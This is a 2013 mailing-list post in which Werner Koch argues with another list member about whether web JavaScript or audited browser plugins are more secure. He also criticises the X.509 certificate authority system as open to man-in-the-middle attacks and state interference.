Security and Javascript
Werner Koch
wk at gnupg.org
Fri Jun 28 20:09:54 UTC 2013
On Fri, 28 Jun 2013 13:34, timo.lindfors at iki.fi said:
> btw, no need to Cc: me since I'm on the list.
[ Then please set an MFT header and my MUA will comply. That discussion
is > 15 years old and we have since then a working solution.]
> But surely virus checker is a blacklist and javascript isolation is more
> like a whitelist?
It is a blacklist: For example: The code loaded from external source may
not open a file on user's host. A whitelist would cleary state what the
code is allowed to do. But then it wouldn't be a useful language
anymore.
>> - The user is enabled to control the code.
>
> Well in most cases they are not since the plugins are non-free..
We are talking about security and thus free or non-free is just one data
point to evaluate whether it is secure. Even a non-free plugin may be
considered secure in some organizations. But right, free software is
much more useful in this regard.
>> - The plugin has a well defined behaviour and is not a volatile bunch
>> of code.
>
> Not sure what this would mean, at least oracle java plugin updates try
> to trick users into installing ask toolbar:
That is a feature which needs to be evaluated during the audit. There
pros and cons for automated updated. But even such automated updates
are standard in that they have a defined version with the same code at
all sites. That can't be guaranteed by the usual use of JS which
commonly comes from a whole bunch of sites (and the reason why it is
virtually impossible to not use google).
>> - A security audit of the plugin can be done.
>
> See the point about non-free plugins :(
That usually makes the audit easy: We can't audit it thus it shall not
be used.
>> Please, I don't want to hear a claim, that the JS code on web sites is
>> secure because it is signed or distributed via a trusted (https) web
>> site. PKIX (the X.509 based infrastructure used by https) is fucked up
>> beyond all repair.
>
> I guess you need to define "secure" bit better here.
Here in the sense that it is a well defined set of code which comes with
a signature and can be tracked back to an audit or a trusted source. it
can't: MitM attack on PKIX are commonplace. Does anyone really believe
that the NSA has no means to ask another secret service to have one of
their national CAs issue a malicious certificate? Come on: That system
has been corrupted by the PKI business ever since. Nobody can expect
that they ever withstood requests from the slouch hats.
Salam-Shalom,
Werner
--
Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz.
More information about the Discussion
mailing list